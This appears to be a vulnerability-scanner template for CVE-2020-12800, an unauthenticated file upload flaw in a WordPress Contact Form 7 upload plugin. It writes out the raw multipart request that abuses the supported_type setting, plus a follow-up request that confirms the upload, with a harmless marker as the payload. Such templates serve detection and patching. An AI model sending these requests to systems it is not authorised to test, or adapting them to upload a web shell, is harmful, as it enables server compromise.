id: CVE-2020-12800 info: name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE author: dwisiswant0 severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 tags: cve,cve2020,wordpress,wp-plugin,upload classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-12800 cwe-id: CWE-434 requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601 X-Requested-With: XMLHttpRequest -----------------------------350278735926454076983690555601 Content-Disposition: form-data; name="supported_type" txt% -----------------------------350278735926454076983690555601 Content-Disposition: form-data; name="size_limit" 5242880 -----------------------------350278735926454076983690555601 Content-Disposition: form-data; name="action" dnd_codedropz_upload -----------------------------350278735926454076983690555601 Content-Disposition: form-data; name="type" click -----------------------------350278735926454076983690555601 Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%" Content-Type: application/x-httpd-php CVE-2020-12800-{{randstr}} -----------------------------350278735926454076983690555601-- - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "CVE-2020-12800-{{randstr}}" - type: word part: header words: - "text/plain"